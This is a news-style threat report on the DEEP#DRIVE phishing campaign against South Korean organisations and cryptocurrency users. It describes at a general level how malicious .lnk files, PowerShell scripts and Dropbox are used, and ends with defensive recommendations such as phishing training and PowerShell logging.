DEEP#DRIVE: Massive Cyber Espionage Operation
A large-scale cyberattack, known as DEEP#DRIVE, has been launched against South Korean businesses, government agencies, and cryptocurrency users. This phishing attack has already affected thousands of individuals, with hackers using fake documents to trick victims into downloading harmful software. The attack was first detected in September 2024, and its primary goal appears to be stealing sensitive information from South Korean entities.
Cybersecurity researchers investigating this campaign discovered that hackers are sending phishing emails written in Korean, disguised as important documents such as work logs, insurance files, and cryptocurrency-related reports. These emails contain malicious attachments that, when opened, install malware on the victim’s device.
One example of this deception involved a file disguised as a Telegram.exe application. The document was labeled 대차 및 파레트, which translates to “bogie and pallet” in Korean. It contained details like product name, factory location, and total weight, suggesting that hackers were targeting businesses in the logistics sector.
To make the attack more convincing, hackers used trusted file formats, such as .hwp (a common Korean document format), .xlsx (Excel spreadsheets), and .pptx (PowerPoint presentations). These files were often stored on popular platforms like Dropbox, which helped the hackers avoid detection by traditional security systems. Researchers have confirmed that phishing was the primary method of infection, as the filenames and document themes closely matched common phishing techniques.
How the DEEP#DRIVE Attack Works
The DEEP#DRIVE campaign follows a multi-stage process designed to infect victims’ systems and extract valuable data. The attack typically begins when a user opens a .lnk file, which appears to be a harmless document but is actually a shortcut that executes malicious PowerShell scripts. These scripts allow hackers to gain control over the system and deploy additional harmful software.
Once the attack begins, the PowerShell script performs several key actions:
- Collecting system details, including the victim’s IP address, operating system version, installed antivirus software, and currently running processes.
- Downloading additional malicious files, disguised as legitimate applications such as Telegram.exe.
- Ensuring the malware remains active on the system, by setting up scheduled tasks like ChromeUpdateTaskMachine to run automatically.
Exfiltrating stolen data to the hackers’ Dropbox accounts.
One of the primary tools used in this campaign was a script called “system_first.ps1”, which gathered critical system information and sent it to the hackers. Another script, “temp.ps1”, was responsible for deploying the final malicious payload. While researchers were unable to capture the full details of this payload, they suspect it was a backdoor, allowing hackers to gain persistent access to infected devices.
To avoid detection, the hackers used advanced stealth techniques, including:
- Using meaningless variable names to make scripts harder to analyze.
- Adding unnecessary lines of code to create confusion.
- Manipulating strings in a complex way to prevent easy identification by security tools.
Additionally, once the attack was completed, the hackers deleted their Dropbox links, making it difficult for investigators to trace their activity. This suggests that the attackers had planned the operation carefully and used a temporary attack infrastructure to evade tracking.
Suspected Hackers and Security Measures
The methods and techniques used in the DEEP#DRIVE attack closely resemble past cyber operations carried out by an Advanced Persistent Threat (APT) group known for targeting South Korea. Cybersecurity researchers believe that the same group is behind this attack due to their use of phishing, PowerShell scripts, and Dropbox for data exfiltration.
To protect against similar attacks, cybersecurity experts recommend several important measures. One of the most critical steps is educating users about phishing tactics. Many cyberattacks succeed because people unknowingly click on malicious links or download infected files. Organizations should train employees to identify suspicious emails, avoid clicking on unverified links, and be cautious when downloading attachments.
Another key defense strategy is monitoring malware staging directories. Many attacks involve storing temporary malicious files on a system before executing them. Security teams should regularly check these directories for unusual or unauthorized files that could indicate an ongoing attack. By identifying threats at an early stage, organizations can prevent malware from spreading further.
Lastly, experts emphasize the importance of using strong endpoint logging systems, such as PowerShell logging. Since PowerShell scripts are commonly used in cyberattacks, logging all PowerShell activity can help security teams detect suspicious commands or unauthorized access attempts. This allows organizations to respond quickly and block malicious activities before they cause significant damage.
The DEEP#DRIVE cyberattack highlights the growing risks posed by phishing campaigns and the need for strong cybersecurity measures. With thousands of people already affected, this is one of the most significant cyber threats targeting South Korea in 2024.
